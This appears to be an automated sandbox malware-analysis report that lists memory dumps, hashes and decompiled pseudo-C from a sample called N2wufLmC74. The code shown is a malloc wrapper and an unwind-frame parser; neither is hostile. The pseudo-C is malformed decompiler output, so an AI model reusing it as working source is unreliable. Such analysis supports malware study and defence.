Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: e72c9c79c24de6b2498974d7da1bf44a36ff76be27b23933060a00348a801a1c
Instruction ID: 8708a931338112bbafad131b56e3650cc72eb2d7336d594f382e95b6e7b0d1c1
Opcode Fuzzy Hash: e72c9c79c24de6b2498974d7da1bf44a36ff76be27b23933060a00348a801a1c
Instruction Fuzzy Hash: E611C9B0605242CFEB18EF1CE499B16BBF0FB21359F418949D5458B2A5E734E418CFD5

Uniqueness

Uniqueness Score: -1.00%

Function 013CD8A3 Relevance: 1.3, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 01479C9E

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 7c62f0bfc9a09f31d2e9e2fa9c1e38421cc28f922c078cd90a15d62e999e9ecf
Instruction ID: c96d8e106d1ab03c2c001ada8e90a1cd8775f8aeccdb854c04301ffd3ab53177
Opcode Fuzzy Hash: 7c62f0bfc9a09f31d2e9e2fa9c1e38421cc28f922c078cd90a15d62e999e9ecf
Instruction Fuzzy Hash: 2F11D7B0904242CFEB14EF1DE498B26BBF0FB21359F518949C5458B2A5EB74E428CFD5

Uniqueness

Uniqueness Score: -1.00%

Function 013CD741 Relevance: 1.3, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 01479C9E

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: e9abcf084440b5bc5fc5bc32ca5168e6ab6eae651a5901f5bbef799fff92c6bd
Instruction ID: 4bf00930382c46cd9ec65b0f4532005639cb0f53ce546012930dba121ba10f0e
Opcode Fuzzy Hash: e9abcf084440b5bc5fc5bc32ca5168e6ab6eae651a5901f5bbef799fff92c6bd
Instruction Fuzzy Hash: 3411D7B0504242CFEB14EF29E098726BBE0FB22359F558949C5458B295EB74E414CF95

Uniqueness

Uniqueness Score: -1.00%

Function 013CD83D Relevance: 1.3, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 01479C9E

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 5392284bc0e3566450b3aa27a6a4a22761741d114088121bd136d90749942495
Instruction ID: 2fdf2a5e90980c235278880ec76c1247675715fd5f4e2f59c8644c880b968b2f
Opcode Fuzzy Hash: 5392284bc0e3566450b3aa27a6a4a22761741d114088121bd136d90749942495
Instruction Fuzzy Hash: 4201E9B0504242CFDB14EF18E098726BBE0FF11359F418949C5458B295EB35E414CFD5

Uniqueness

Uniqueness Score: -1.00%

Function 01477960 Relevance: 1.3, APIs: 1, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E01477960(intOrPtr _a4) {
				void* _v20;
				void* _v24;
				int __ebx;
				intOrPtr _t4;
				void* _t6;

				_t4 = _a4;
				_t8 =  !=  ? _t4 : 1;
				_t6 =  !=  ? _t4 : 1;
				while(1) {
					__eax = malloc(__ebx); // executed
					if(__eax != 0) {
						break;
					}
					__eax = E01472180();
					if(__eax == 0) {
						 *((intOrPtr*)(E01477A00(__ebx, __esi, 4))) = 0x14b24cc;
						E01477BA0(__ebx, __edi, __esi, __ebp) = 0;
						return 0;
					} else {
						__eax =  *__eax();
						continue;
					}
					L7:
				}
				__esp = __esp + 0x18;
				_pop(__ebx);
				return __eax;
				goto L7;
			}

0x01477969
0x0147796f
0x01477972
0x01477974
0x01477977
0x0147797e
0x00000000
0x00000000
0x01477985
0x0147798c
0x01479e34
0x01479e61
0x01477952
0x01477992
0x01477992
0x00000000
0x01477992
0x00000000
0x0147798c
0x01477980
0x01477983
0x01477984
0x00000000

APIs

malloc.MSVCRT ref: 01477977

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 4678f2bfaed66beba3f0a59df5b61d2219bb99b402ca5b495757c9fbb9123018
Instruction ID: 465365263c842babbe375d7bf9d6a67cd6f88a54a5ba0da192906ac590245a79
Opcode Fuzzy Hash: 4678f2bfaed66beba3f0a59df5b61d2219bb99b402ca5b495757c9fbb9123018
Instruction Fuzzy Hash: 84F037B16057039FE7007FB989886AFBAE4AFA5245F854C2ED685C7371FB38C5408762

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 013D7CB0 Relevance: 33.4, APIs: 22, Instructions: 441
stringCOMMONCrypto

Download Yara Rule

C-Code - Quality: 41%

			E013D7CB0(void* __eax, void* __edx, signed int _a72, signed int _a76, signed int _a80, char _a84, signed int _a92, unsigned int _a96, signed int _a104) {
				void* _v16;
				signed int _v32;
				signed char _v45;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				char* _v88;
				char* _v132;
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				void* _t164;
				void* _t167;
				void* _t168;
				void* _t176;
				void* _t178;
				void* _t180;

				_t164 = __edx;
				_t176 = __eax;
				_t167 = __edx;
				memset(__edx, 0, 0x30 << 2);
				_t180 = _t178 - 0x4c + 0xc;
				_t168 = _t167 + 0x30;
				_v64 = _t164;
				_a104 = 0;
				_a80 = 0;
				if(_a76 == 0) {
					L65:
					return 5;
				} else {
					__eax =  &_a84;
					_v88 =  &_a84;
					__eax = _a96;
					__eax = _a96 >> 0x1f;
					__eax = __edx + (_a96 >> 0x1f) - 1;
					 *__esp = __edx + (_a96 >> 0x1f) - 1;
					__eax = E013DAE90(__ecx);
					_v60 = __eax;
					if(__eax == 0) {
						__eax = _a76;
						__ecx = _a72;
						__edx =  *(__eax - 5) & 0x000000ff;
						if( *((char*)(__eax - 2)) == 0xff) {
							if( *((char*)(__eax - 1)) != 0xd0) {
								goto L59;
							} else {
								if( *__eax != 0x83) {
									goto L59;
								} else {
									if( *(__eax + 1) != 0xf8) {
										goto L59;
									} else {
										goto L87;
									}
								}
							}
						} else {
							L59:
							if(__dl == 0xe8) {
								__edx =  *__eax & 0x000000ff;
								if( *((char*)(__eax - 4)) == 0x68) {
									if(__dl != 0xc3) {
										goto L89;
									} else {
										L87:
										__eax =  *__ecx;
										__eax =  *( *__ecx + 4);
										goto L83;
									}
								} else {
									L89:
									if(__dl != 0x83) {
										goto L62;
									} else {
										if( *(__eax + 1) != 0xc4) {
											goto L65;
										} else {
											if( *((char*)(__eax + 3)) != 0xb8) {
												goto L65;
											} else {
												__eax =  *(__ecx + 0x38);
												goto L83;
											}
										}
									}
								}
							} else {
								if(__dl != 0x8b) {
									L62:
									if( *((char*)(__eax - 1)) != 0x83) {
										goto L65;
									} else {
										if( *__eax != 9) {
											goto L65;
										} else {
											if( *(__eax + 1) == 0) {
												if( *(__eax + 2) != 0x2d) {
													goto L65;
												} else {
													if( *((char*)(__eax + 3)) != 0) {
														goto L65;
													} else {
														if( *(__eax + 4) != 0x10) {
															goto L65;
														} else {
															if( *((char*)(__eax + 5)) != 0) {
																goto L65;
															} else {
																__eax = _v64;
																 *((intOrPtr*)(__eax + 0xa0)) = 1;
																 *((intOrPtr*)(__eax + 0x98)) = 4;
																 *((intOrPtr*)(__eax + 0x94)) = 4;
																 *((intOrPtr*)(__eax + 0xc)) = 1;
																 *((intOrPtr*)(__eax + 8)) = 0xfffffffc;
																 *(__eax + 0xb4) = 8;
																 *((intOrPtr*)(__eax + 0x44)) = 1;
																 *((intOrPtr*)(__eax + 0x40)) = 0;
																 *((char*)(__eax + 0xbb)) = 1;
																__eax = 0;
																goto L42;
															}
														}
													}
												}
											} else {
												goto L65;
											}
										}
									}
								} else {
									if( *((char*)(__eax - 4)) == 0x4d) {
										if( *__eax != 0x64) {
											goto L62;
										} else {
											if( *(__eax + 1) != 0x8b) {
												goto L65;
											} else {
												__eax =  *(__ecx + 8);
												L83:
												__edx =  *(__eax + 0xc4);
												__edi = _v64;
												__esi = __edx;
												 *(__edi + 4) = 1;
												__esi = __edx - __ecx;
												_t115 = __eax + 0xb0; // 0x118
												__ecx = _t115;
												 *((intOrPtr*)(__edi + 0xa0)) = 1;
												__ecx = _t115 - __edx;
												 *(__edi + 0x94) = __esi;
												 *__edi = _t115 - __edx;
												_t118 = __eax + 0xa4; // 0x10c
												_t118 = _t118 - __edx;
												 *((intOrPtr*)(__edi + 0x1c)) = 1;
												 *((intOrPtr*)(__edi + 0x18)) = _t118 - __edx;
												_t121 = __eax + 0xac; // 0x114
												_t121 = _t121 - __edx;
												 *((intOrPtr*)(__edi + 0xc)) = 1;
												 *((intOrPtr*)(__edi + 8)) = _t121 - __edx;
												_t124 = __eax + 0xa8; // 0x110
												_t124 = _t124 - __edx;
												 *((intOrPtr*)(__edi + 0x14)) = 1;
												 *((intOrPtr*)(__edi + 0x10)) = _t124 - __edx;
												_t127 = __eax + 0xa0; // 0x108
												_t127 = _t127 - __edx;
												 *((intOrPtr*)(__edi + 0x34)) = 1;
												 *((intOrPtr*)(__edi + 0x30)) = _t127 - __edx;
												_t130 = __eax + 0x9c; // 0x104
												_t130 = _t130 - __edx;
												 *((intOrPtr*)(__edi + 0x3c)) = 1;
												 *((intOrPtr*)(__edi + 0x38)) = _t130 - __edx;
												_t133 = __eax + 0xb4; // 0x11c
												__ecx = _t133;
												__eax = __eax + 0xb8;
												__eax = __eax - __edx;
												__ecx = _t133 - __edx;
												 *((intOrPtr*)(__edi + 0x98)) = 4;
												 *(__edi + 0x40) = __eax;
												__eax = 0;
												 *((intOrPtr*)(__edi + 0x2c)) = 1;
												 *(__edi + 0x28) = _t133 - __edx;
												 *((intOrPtr*)(__edi + 0x44)) = 1;
												 *(__edi + 0xb4) = 8;
												 *((char*)(__edi + 0xbb)) = 1;
												goto L42;
											}
										}
									} else {
										goto L62;
									}
								}
							}
						}
					} else {
						__eax = _a92;
						__edi = _v64;
						 *(_v64 + 0xa4) = _a92;
						__edi = _v60;
						__eax = __edi + 4;
						__eax = __edi + 4 -  *(__edi + 4);
						_t22 = __eax + 9; // 0xa
						__esi = _t22;
						__edi = __eax;
						_v52 = __eax;
						 *__esp = __esi;
						_v56 = __esi;
						__eax = strlen(??);
						_t27 = __eax + 1; // 0xb
						__eax = __esi + _t27;
						if( *((char*)(__edi + 9)) == 0x65) {
							if( *((char*)(__edi + 0xa)) == 0x68) {
								__edx =  *__eax;
								__edi = _v64;
								__eax = __eax + 4;
								 *(_v64 + 0xbc) = __edx;
								_v52 = _v52 + 0xb;
								_v56 = _v52 + 0xb;
							}
						}
						__edi = _v52;
						__edx =  *__eax & 0x000000ff;
						__ecx =  *(_v52 + 8) & 0x000000ff;
						_v45 = __cl;
						if(__cl > 3) {
							if(__dl == 4) {
								if( *(__eax + 1) != 0) {
									goto L71;
								} else {
									__eax = __eax + 2;
									goto L10;
								}
							} else {
								goto L71;
							}
						} else {
							L10:
							__esi = 0;
							__ecx = 0;
							do {
								__ebx =  *__eax & 0x000000ff;
								__eax = __eax + 1;
								__ebx = __ebx & 0x0000007f;
								__edx = (__ebx & 0x0000007f) << __cl;
								__ecx = __ecx + 7;
								__esi = __esi | (__ebx & 0x0000007f) << __cl;
							} while (__bl < 0);
							__edi = _v64;
							__ecx = 0;
							 *(_v64 + 0xb0) = __esi;
							__edi = 0;
							do {
								__esi = __eax;
								__ebx =  *__eax & 0x000000ff;
								__eax = __eax + 1;
								__ebx = __ebx & 0x0000007f;
								__edx = (__ebx & 0x0000007f) << __cl;
								__ecx = __ecx + 7;
								__edi = __edi | (__ebx & 0x0000007f) << __cl;
							} while (__bl < 0);
							__edx = __ebx;
							__ebx = __esi;
							__esi = __edx;
							if(__ecx <= 0x1f) {
								__esi = __esi & 0x00000040;
								if(__esi != 0) {
									0xffffffff = 0xffffffff << __cl;
									__edi = __edi | 0xffffffff << __cl;
								}
							}
							__esi = _v64;
							__ecx = 0;
							 *(_v64 + 0xac) = __edi;
							__esi = 0;
							if(_v45 == 1) {
								__esi =  *__eax & 0x000000ff;
								_t69 = __ebx + 2; // 0xc
								__eax = _t69;
							} else {
								do {
									__ebx =  *__eax & 0x000000ff;
									__eax = __eax + 1;
									__ebx = __ebx & 0x0000007f;
									__edx = (__ebx & 0x0000007f) << __cl;
									__ecx = __ecx + 7;
									__esi = __esi | (__ebx & 0x0000007f) << __cl;
								} while (__bl < 0);
							}
							__edi = _v64;
							 *(__edi + 0xb4) = __esi;
							 *((char*)(__edi + 0xb9)) = 0xff;
							__edi = _v56;
							__edx =  *_v56 & 0x000000ff;
							__edi = 0;
							if(__dl == 0x7a) {
								__ecx = 0;
								do {
									__ebx =  *__eax & 0x000000ff;
									__eax = __eax + 1;
									__ebx = __ebx & 0x0000007f;
									__edx = (__ebx & 0x0000007f) << __cl;
									__ecx = __ecx + 7;
									__edi = __edi | (__ebx & 0x0000007f) << __cl;
								} while (__bl < 0);
								__esi = _v64;
								__edi = __edi + __eax;
								 *((char*)(_v64 + 0xba)) = 1;
								__esi = _v56;
								__edx =  *(__esi + 1) & 0x000000ff;
								__ecx = __esi + 1;
								if(__dl == 0) {
									goto L30;
								} else {
									_v56 = __ecx;
									goto L22;
								}
							} else {
								if(__dl == 0) {
									__edi = __eax;
									goto L30;
								} else {
									L22:
									__esi = _v56;
									__esi = _v56 + 1;
									while(1) {
										L23:
										__edx = __edx - 0x42;
										if(__dl > 0x11) {
											break;
										}
										__edx = __dl & 0x000000ff;
										switch( *((intOrPtr*)((__dl & 0x000000ff) * 4 +  &M014AC834))) {
											case 0:
												L26:
												__edx =  *__esi & 0x000000ff;
												__esi = __esi + 1;
												__eflags = __dl;
												if(__dl != 0) {
													goto L23;
												} else {
													goto L27;
												}
												goto L118;
											case 1:
												goto L29;
											case 2:
												__edx =  *__eax & 0x000000ff;
												__ecx = _v64;
												__eax = __eax + 1;
												__eflags = __eax;
												 *(_v64 + 0xb9) = __dl;
												goto L26;
											case 3:
												__edx =  *__eax & 0x000000ff;
												_t73 = __eax + 1; // 0x0
												__ecx = _t73;
												__eax =  &_v32;
												__esi = __esi + 1;
												 *__esp =  &_v32;
												__eax = __ebp;
												__eax = E013D68E0(__ebp, _t73, __edx);
												__edx = _v32;
												__ecx = _v64;
												 *((intOrPtr*)(_v64 + 0xa8)) = _v32;
												__edx =  *(__esi - 1) & 0x000000ff;
												__eflags = __dl;
												if(__dl != 0) {
													goto L23;
												} else {
													goto L27;
												}
												goto L118;
											case 4:
												__edx =  *__eax & 0x000000ff;
												__ecx = _v64;
												__eax = __eax + 1;
												__esi = __esi + 1;
												 *(_v64 + 0xb8) = __dl;
												__edx =  *(__esi - 1) & 0x000000ff;
												__eflags = __dl;
												if(__dl != 0) {
													goto L23;
												} else {
													goto L27;
												}
												goto L118;
											case 5:
												__ebx = _v64;
												__esi = __esi + 1;
												 *((char*)(_v64 + 0xbb)) = 1;
												__edx =  *(__esi - 1) & 0x000000ff;
												__eflags = __dl;
												if(__dl != 0) {
													goto L23;
												} else {
													L27:
													__eflags = __edi;
													if(__edi != 0) {
														L30:
														__esi = _v52;
														__ecx = __ebp;
														__eax =  *__esi;
														__edx = __esi +  *__esi + 4;
														__esi = _v64;
														__edi = E013D7420(__edi, __ebp, __edx, __esi);
														__eax =  *(__esi + 0xb8) & 0x000000ff;
														__eflags = __al - 0xff;
														if(__al == 0xff) {
															__esi = 8;
															goto L36;
														} else {
															__eax = __eax & 0x00000007;
															__eflags = __al - 2;
															if(__eflags == 0) {
																__esi = 0xc;
																goto L36;
															} else {
																if(__eflags <= 0) {
																	__eflags = __al;
																	if(__al != 0) {
																		goto L97;
																	} else {
																		goto L57;
																	}
																} else {
																	__eflags = __al - 3;
																	if(__al == 3) {
																		L57:
																		__esi = 0x10;
																		goto L36;
																	} else {
																		__eflags = __al - 4;
																		if(__al != 4) {
																			L97:
																			abort();
																			abort();
																			abort();
																			abort();
																			abort();
																			abort();
																			abort();
																			abort();
																			abort();
																			abort();
																			abort();
																			abort();
																			abort();
																			abort();
																			abort();
																			abort();
																			abort();
																			abort();
																			abort();
																			abort();
																			abort();
																			_push(_t176);
																			_push(_t168);
																			_push(_t172);
																			_t182 = _t180 - 0x1c;
																			 *_t182 = "libgcc_s_dw2-1.dll";
																			_t152 = GetModuleHandleA(_t158);
																			_t183 = _t182 - 4;
																			if(_t152 == 0) {
																				_t153 = 0x13dae40;
																				_t174 = E013DA660;
																			} else {
																				_t161 = _t152;
																				 *_t183 = "libgcc_s_dw2-1.dll";
																				_t156 = LoadLibraryA(??);
																				_t185 = _t183 - 4;
																				 *0x14f2020 = _t156;
																				_v132 = "__register_frame_info";
																				 *_t185 = _t161;
																				_t157 = GetProcAddress(??, ??);
																				_t186 = _t185 - 8;
																				_t174 = _t157;
																				_v132 = "__deregister_frame_info";
																				 *_t186 = _t161;
																				_t153 = GetProcAddress(??, ??);
																				_t183 = _t186 - 8;
																			}
																			 *0x1481004 = _t153;
																			if(_t174 != 0) {
																				_v132 = 0x14f2024;
																				 *_t183 = 0x14b3104;
																				 *_t174();
																			}
																			 *_t183 = E013C1560;
																			return E013C14A0();
																		} else {
																			__esi = 0x18;
																			L36:
																			__eax = _v60;
																			__esi = __esi + _v60;
																			__eax = _v64;
																			__eflags =  *((char*)(__eax + 0xba));
																			__edx =  *(__eax + 0xb9) & 0x000000ff;
																			if( *((char*)(__eax + 0xba)) == 0) {
																				__eflags = __dl - 0xff;
																				if(__dl != 0xff) {
																					__eax =  &_v32;
																					__ecx = __esi;
																					 *__esp =  &_v32;
																					__eax = __ebp;
																					__esi = E013D68E0(__ebp, __esi, __edx);
																					__eax = _v32;
																					_a80 = _v32;
																				}
																			} else {
																				__edi = 0;
																				__ecx = 0;
																				__eflags = 0;
																				do {
																					__ebx =  *__esi & 0x000000ff;
																					__esi = __esi + 1;
																					__ebx = __ebx & 0x0000007f;
																					__eax = (__ebx & 0x0000007f) << __cl;
																					__ecx = __ecx + 7;
																					__edi = __edi | (__ebx & 0x0000007f) << __cl;
																					__eflags = __bl;
																				} while (__bl < 0);
																				__eflags = __dl - 0xff;
																				if(__dl != 0xff) {
																					__eax =  &_v32;
																					__ecx = __esi;
																					__edx = __dl & 0x000000ff;
																					__esi = __esi + __edi;
																					 *__esp =  &_v32;
																					__ebp = E013D68E0(__ebp, __ecx, __dl & 0x000000ff);
																					__eax = _v32;
																					_a80 = _v32;
																				} else {
																					__esi = __esi + __edi;
																					__eflags = __esi;
																				}
																			}
																			__edi = _v60;
																			__ecx = __ebp;
																			__eax =  *__edi;
																			__edx = __edi +  *__edi + 4;
																			__eax = _v64;
																			 *__esp = _v64;
																			__esi = E013D7420(__esi, __ebp, __edi +  *__edi + 4);
																			__eax = 0;
																			__eflags = 0;
																			L42:
																			__esp =  &(__esp[0x13]);
																			_pop(__ebx);
																			_pop(__esi);
																			_pop(__edi);
																			return __eax;
																		}
																	}
																}
															}
														}
													} else {
														__edi = __eax;
														goto L29;
													}
												}
												goto L118;
										}
									}
									L29:
									if(__edi == 0) {
										L71:
										__esp =  &(__esp[0x13]);
										__eax = 3;
										_pop(__ebx);
										_pop(__esi);
										_pop(__edi);
										return 3;
									} else {
										goto L30;
									}
								}
							}
						}
					}
				}
				L118:
			}

0x013d7cb0
0x013d7cb6
0x013d7cbb
0x013d7cc2
0x013d7cc2
0x013d7cc2
0x013d7cc4
0x013d7cc8
0x013d7cd2
0x013d7cdb
0x013d8099
0x013d80a5
0x013d7ce1
0x013d7ce1
0x013d7ce4
0x013d7ce8
0x013d7ceb
0x013d7cee
0x013d7cf2
0x013d7cf5
0x013d7cfa
0x013d7d00
0x013d8058
0x013d805b
0x013d8062
0x013d8066
0x013d82ae
0x00000000
0x013d82b4
0x013d82b7
0x00000000
0x013d82bd
0x013d82c1
0x00000000
0x00000000
0x00000000
0x00000000
0x013d82c1
0x013d82b7
0x013d806c
0x013d806c
0x013d806f
0x013d82d5
0x013d82d8
0x013d830a
0x00000000
0x013d830c
0x013d82c7
0x013d82c7
0x013d82c9
0x00000000
0x013d82c9
0x013d82da
0x013d82da
0x013d82dd
0x00000000
0x013d82e3
0x013d82e7
0x00000000
0x013d82ed
0x013d82f1
0x00000000
0x013d82f7
0x013d82f7
0x00000000
0x013d82f7
0x013d82f1
0x013d82e7
0x013d82dd
0x013d8075
0x013d8078
0x013d8084
0x013d8088
0x00000000
0x013d808a
0x013d808d
0x00000000
0x013d808f
0x013d8093
0x013d814c
0x00000000
0x013d8152
0x013d8156
0x00000000
0x013d815c
0x013d8160
0x00000000
0x013d8166
0x013d816a
0x00000000
0x013d8170
0x013d8170
0x013d8174
0x013d817e
0x013d8188
0x013d8192
0x013d8199
0x013d81a0
0x013d81aa
0x013d81b1
0x013d81b8
0x013d81bf
0x00000000
0x013d81bf
0x013d816a
0x013d8160
0x013d8156
0x00000000
0x00000000
0x00000000
0x013d8093
0x013d808d
0x013d807a
0x013d807e
0x013d81c9
0x00000000
0x013d81cf
0x013d81d3
0x00000000
0x013d81d9
0x013d81d9
0x013d81dc
0x013d81dc
0x013d81e2
0x013d81e6
0x013d81e8
0x013d81ef
0x013d81f1
0x013d81f1
0x013d81f7
0x013d8201
0x013d8203
0x013d8209
0x013d820b
0x013d8211
0x013d8213
0x013d821a
0x013d821d
0x013d8223
0x013d8225
0x013d822c
0x013d822f
0x013d8235
0x013d8237
0x013d823e
0x013d8241
0x013d8247
0x013d8249
0x013d8250
0x013d8253
0x013d8259
0x013d825b
0x013d8262
0x013d8265
0x013d8265
0x013d826b
0x013d8270
0x013d8272
0x013d8274
0x013d827e
0x013d8281
0x013d8283
0x013d828a
0x013d828d
0x013d8294
0x013d829e
0x00000000
0x013d829e
0x013d81d3
0x00000000
0x00000000
0x00000000
0x013d807e
0x013d8078
0x013d806f
0x013d7d06
0x013d7d06
0x013d7d09
0x013d7d0d
0x013d7d13
0x013d7d17
0x013d7d1a
0x013d7d1d
0x013d7d1d
0x013d7d20
0x013d7d22
0x013d7d26
0x013d7d29
0x013d7d2d
0x013d7d36
0x013d7d36
0x013d7d3a
0x013d7f34
0x013d7f3a
0x013d7f3c
0x013d7f40
0x013d7f43
0x013d7f4d
0x013d7f50
0x013d7f50
0x013d7f34
0x013d7d40
0x013d7d44
0x013d7d47
0x013d7d4b
0x013d7d52
0x013d811b
0x013d813e
0x00000000
0x013d8140
0x013d8140
0x00000000
0x013d8140
0x00000000
0x00000000
0x00000000
0x013d7d58
0x013d7d58
0x013d7d58
0x013d7d5a
0x013d7d60
0x013d7d60
0x013d7d63
0x013d7d68
0x013d7d6b
0x013d7d6d
0x013d7d70
0x013d7d72
0x013d7d76
0x013d7d7a
0x013d7d7c
0x013d7d82
0x013d7d88
0x013d7d88
0x013d7d8a
0x013d7d8d
0x013d7d92
0x013d7d95
0x013d7d97
0x013d7d9a
0x013d7d9c
0x013d7da0
0x013d7da2
0x013d7da4
0x013d7da9
0x013d7dab
0x013d7dae
0x013d7db5
0x013d7db7
0x013d7db7
0x013d7dae
0x013d7db9
0x013d7dbd
0x013d7dbf
0x013d7dc5
0x013d7dcc
0x013d7fb0
0x013d7fb3
0x013d7fb3
0x00000000
0x013d7dd8
0x013d7dd8
0x013d7ddb
0x013d7de0
0x013d7de3
0x013d7de5
0x013d7de8
0x013d7dea
0x013d7dd8
0x013d7dee
0x013d7df2
0x013d7df8
0x013d7dff
0x013d7e03
0x013d7e06
0x013d7e0b
0x013d7f60
0x013d7f68
0x013d7f68
0x013d7f6b
0x013d7f70
0x013d7f73
0x013d7f75
0x013d7f78
0x013d7f7a
0x013d7f7e
0x013d7f82
0x013d7f84
0x013d7f8b
0x013d7f8f
0x013d7f93
0x013d7f98
0x00000000
0x013d7f9e
0x013d7f9e
0x00000000
0x013d7f9e
0x013d7e11
0x013d7e13
0x013d8300
0x00000000
0x013d7e19
0x013d7e19
0x013d7e19
0x013d7e1d
0x013d7e20
0x013d7e20
0x013d7e20
0x013d7e26
0x00000000
0x00000000
0x013d7e28
0x013d7e2b
0x00000000
0x013d7e48
0x013d7e48
0x013d7e4b
0x013d7e4e
0x013d7e50
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x013d7e38
0x013d7e3b
0x013d7e3f
0x013d7e3f
0x013d7e42
0x00000000
0x00000000
0x013d7fe8
0x013d7feb
0x013d7feb
0x013d7fee
0x013d7ff2
0x013d7ff5
0x013d7ff8
0x013d7ffa
0x013d7fff
0x013d8003
0x013d8007
0x013d800d
0x013d8011
0x013d8013
0x00000000
0x013d8019
0x00000000
0x013d8019
0x00000000
0x00000000
0x013d7fc0
0x013d7fc3
0x013d7fc7
0x013d7fca
0x013d7fcd
0x013d7fd3
0x013d7fd7
0x013d7fd9
0x00000000
0x013d7fdf
0x00000000
0x013d7fdf
0x00000000
0x00000000
0x013d8020
0x013d8024
0x013d8027
0x013d802e
0x013d8032
0x013d8034
0x00000000
0x013d803a
0x013d7e52
0x013d7e52
0x013d7e54
0x013d7e68
0x013d7e68
0x013d7e6c
0x013d7e6e
0x013d7e70
0x013d7e74
0x013d7e7d
0x013d7e82
0x013d7e89
0x013d7e8b
0x013d8130
0x00000000
0x013d7e91
0x013d7e91
0x013d7e94
0x013d7e96
0x013d8108
0x00000000
0x013d7e9c
0x013d7e9c
0x013d8040
0x013d8042
0x00000000
0x00000000
0x00000000
0x00000000
0x013d7ea2
0x013d7ea2
0x013d7ea4
0x013d8048
0x013d8048
0x00000000
0x013d7eaa
0x013d7eaa
0x013d7eac
0x0147aa0f
0x0147aa0f
0x0147aa14
0x0147aa19
0x0147aa1e
0x0147aa23
0x0147aa28
0x0147aa2d
0x0147aa32
0x0147aa37
0x0147aa3c
0x0147aa44
0x0147aa49
0x0147aa4e
0x0147aa53
0x0147aa58
0x0147aa5d
